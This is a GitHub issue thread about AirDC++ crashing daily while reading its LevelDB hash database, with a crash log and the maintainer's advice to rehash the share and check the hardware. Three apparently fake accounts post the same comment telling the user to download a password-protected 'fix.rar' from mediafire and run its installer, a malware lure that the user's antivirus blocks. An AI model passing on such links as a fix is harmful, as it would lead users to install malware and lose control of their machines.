### ISSUE TITLE
🐛 [Bug]: <title>constant crashes

### ISSUE THREAD

**Issue by mandrix1** [airdcpp/airdcpp-windows#135]
### Prerequisites

- [X] This is not a [support issue or a question](https://github.com/airdcpp/airdcpp-windows/discussions)
- [X] I performed a [cursory search of the issue tracker](https://github.com/airdcpp/airdcpp-windows/issues) to avoid opening a duplicate issue
- [X] I am running the latest version of AirDC++

### Describe the issue

AIRDCPP is crashing constantly (daily)

 Can someone interpret this file and tell me what is happening

### Expected behavior

 No crashes?

### Actual behavior

Crashes almost daily.

### Crash log

```shell
Code: c0000006 ( Page error )
Version: AirDC++ 4.21 x64
Build: 4688
Major: 6
Minor: 2
Build: 9200
SP: 0
Type: 1
Time: 2024-08-27 06:00:18
TTH: XVD7Y4Y3ZK7WZVKBIITFBKENJZ4XJD7NOWVPHVY

C:\Projects\airdc-git\leveldb\table\format.cc(97): leveldb::ReadBlock
C:\Projects\airdc-git\leveldb\table\table.cc(177): leveldb::Table::BlockReader
C:\Projects\airdc-git\leveldb\table\table.cc(228): leveldb::Table::InternalGet
C:\Projects\airdc-git\leveldb\db\table_cache.cc(108): leveldb::TableCache::Get
C:\Projects\airdc-git\leveldb\db\version_set.cc(354): `leveldb::Version::Get'::`2'::State::Match
C:\Projects\airdc-git\leveldb\db\version_set.cc(316): leveldb::Version::ForEachOverlapping
C:\Projects\airdc-git\leveldb\db\version_set.cc(399): leveldb::Version::Get
C:\Projects\airdc-git\leveldb\db\db_impl.cc(1147): leveldb::DBImpl::Get
C:\Program Files\Microsoft Visual Studio\2022\Enterprise\VC\Tools\MSVC\14.37.32822\include\functional(841): std::_Func_impl_no_alloc<`dcpp::LevelDB::get'::`2'::<lambda_1>=0x322079BB,leveldb::Status>::_Do_call
C:\Projects\airdc-git\airdcpp\airdcpp\LevelDB.cpp(241): dcpp::LevelDB::performDbOperation
C:\Projects\airdc-git\airdcpp\airdcpp\LevelDB.cpp(141): dcpp::LevelDB::get
C:\Projects\airdc-git\airdcpp\airdcpp\HashStore.cpp(187): dcpp::HashStore::getTree
C:\Projects\airdc-git\airdcpp\airdcpp\HashManager.cpp(107): dcpp::HashManager::getTree
C:\Projects\airdc-git\airdcpp\airdcpp\ShareManager.cpp(462): dcpp::ShareManager::getTree
C:\Projects\airdc-git\airdcpp\airdcpp\UploadManager.cpp(322): dcpp::UploadManager::prepareFile
C:\Projects\airdc-git\airdcpp\airdcpp\UploadManager.cpp(971): dcpp::UploadManager::on
C:\Projects\airdc-git\airdcpp\airdcpp\AdcCommand.h(218): dcpp::CommandHandler<dcpp::UserConnection>::dispatch<>
C:\Projects\airdc-git\airdcpp\airdcpp\UserConnection.cpp(143): dcpp::UserConnection::on
C:\Projects\airdc-git\airdcpp\airdcpp\Speaker.h(48): dcpp::Speaker<dcpp::FavoriteManagerListener>::fire<dcpp::FavoriteManagerListener::X<2>=0x321C635E,boost::intrusive_ptr<dcpp::FavoriteHubEntry> const &>
C:\Projects\airdc-git\airdcpp\airdcpp\BufferedSocket.cpp(257): dcpp::BufferedSocket::threadRead
C:\Projects\airdc-git\airdcpp\airdcpp\BufferedSocket.cpp(491): dcpp::BufferedSocket::checkSocket
C:\Projects\airdc-git\airdcpp\airdcpp\BufferedSocket.cpp(505): dcpp::BufferedSocket::run
C:\Projects\airdc-git\airdcpp\airdcpp\Thread.cpp(59): dcpp::Thread::starter
minkernel\crts\ucrt\src\appcrt\startup\thread.cpp(97): thread_start<unsigned int (__cdecl*)(void *)=0x3BBF7374,1>
KERNEL32!0x7FF83BBF7374: BaseThreadInitThunk
ntdll!0x7FF83BD3CC91: RtlUserThreadStart
```

### AirDC++ version and architecture (x86 or x64)

4.21 x64

### Operating System name, version and architecture

WINDOWS 11 22H2

**Comment by maksis** [comment]
How much memory do you have available when the crashes happen?

**Comment by mandrix1** [comment]
I will have to wait for another crash to determine that.
The only other software the machine runs concurrently is aquasuite. The machine is basically soley for running the DC++ client and associated storage.

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mandrix1** [comment]
I have been running it after every crash.

**Comment by mandrix1** [comment]
I can not run that file. ESET stops it every time, even if I pause protection.

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mandrix1** [comment]
Yes I was working on two pc's and missed that it was not you that posted it. Very stupid.

**Comment by mandrix1** [comment]
One of several crashes, this was the latest exceptioninfo.txt. Can't see as it's running out of memory. IDK at the time I noticed the crash, I checked available memory and only 20% was in use before I closed out the error message, restarted the app, ran the hash check, (no problems).
As it resides on a separate pc than my main rig it's hard to know when it's crashed except when I switch pc's and check on it.

[exceptioninfo.txt](https://github.com/user-attachments/files/16826117/exceptioninfo.txt)

**Comment by maksis** [comment]
If you can't think of any other reason that might cause an error when reading the database (e.g. hardware problem), I recommend deleting the hash database (FileIndex and HashData directories) and rehashing your share

**Comment by mandrix1** [comment]
Yikes! We’re talking 36TB here. But if that’s what it takes….
Thanks

g

**Comment by mandrix1** [comment]
Apparently AirDC is having trouble reading the hash table at times.
I have no clue why.
My Documents folder is on the D: drive, which is an SSD.
But rehashing everything helped, but did not stop some errors about hashing, which was made clear in the System Log yesterday. I had to stop the client, restart it and optimize the database.

So far since total rehash I have not had the popup stating a file had been written, and AirDC stopping.

By all means close it out though.

g

**Comment by maksis** [comment]
What are the errors that you are getting...?

**Comment by mandrix1** [comment]
Unable to read hash database, or similar.

Is the app looking for the Documents folder to be on the C: drive?
I always move Documents and Downloads to other drives (I have 14).

g

**Comment by maksis** [comment]
The application doesn't care about the drive letters. Have you performed disk checks and system stress tests? You can also try moving the application to a different disk to see if it fixes the errors.

**Comment by mandrix1** [comment]
Yes the disc’s check out OK.
AirDC is the only app running on a dedicated pc as well. (Well it also runs Aquasuite since I have a fan/pump controller).
The pc has 6 HDD’s and two SSD’s, one for the OS and the other has the Doc’s folder on it.

About 36TB of data is hashed.

FWIW.

I guess if the Documents folder isn’t moved then all the hash data should be intact. I may try moving the install location to the same drive as the Doc’s folder and see if that helps.

Thanks.

g

**Comment by mandrix1** [comment]
I realized I listed number of drives for two different machines. I used to run AirDC from my main rig (with all the drives) now it’s run from a dedicated machine, to be clear, with 6 HDD’s and two SSD’s.

Sorry I’m in the middle of figuring out some software for creating RAID with my SAS card on the main rig and mixed things up.

g

**Comment by mandrix1** [comment]
Yes everything looks ok. May try moving the app to the Doc’s drive.

Thanks.
